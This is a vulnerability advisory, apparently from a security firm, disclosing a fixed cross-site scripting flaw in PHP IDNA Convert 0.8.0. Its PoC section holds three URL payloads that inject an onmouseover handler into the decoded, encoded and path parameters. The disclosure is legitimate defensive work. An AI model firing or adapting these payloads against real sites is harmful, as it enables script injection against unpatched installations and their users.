[ PHP IDNA Convert Cross-site scripting ( XSS ) ] [ Vendor product description] PHP Net_IDNA is a class to convert between the Punycode and Unicode formats. Punycode is a standard described in RFC 3492 and part of IDNA (Internationalizing Domain Names in Applications [RFC3490]) . This class allows PHP scripts to convert these domain names without having one of the PHP extensions installed. It supports both IDNA 2003 and IDNA 2008. [ Bug Description ] Cross-site scripting (XSS) vulnerability in parameters encoded/decoded in the class PHP IDNA Convert allows remote attackers to inject arbitrary web script or HTML. [ History ] Advisory sent to vendor on 09/24/2013 Vendor reply on 09/25/2013 Vulnerability fixed on 09/26/2013 [ Impact ] HIGH [ Afected Version ] 0.8.0 [ Vendor Reply ] Yes. Version 0.8.1 released [ CVE Reference ] [ PoC ] Payloads: http://[host]/idna_convert/index.php?decoded=94102%22%20onmouseover%3dprompt(929882)%20bad%3d%22&encode=Encode%20>>&idn_version=2003 http://[host]/idna_convert/example.php?decode=<<%20Decode&encoded=94102%22%20onmouseover%3dprompt(938200)%20bad%3d%22 http://[host]/index.php/%22onmouseover%3d%27prompt%28976724%29%27bad%3d%22%3E [ References ] [1] PHP IDNA Convert - http://phlymail.com/en/downloads/idna-convert.html [2] Owasp Cross-site scripting - https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ -------------------------------------------- iBliss Segurança e Inteligência - Sponsor: Alexandro Silva - Alexos alexos (at) ibliss.com (dot) br [email concealed]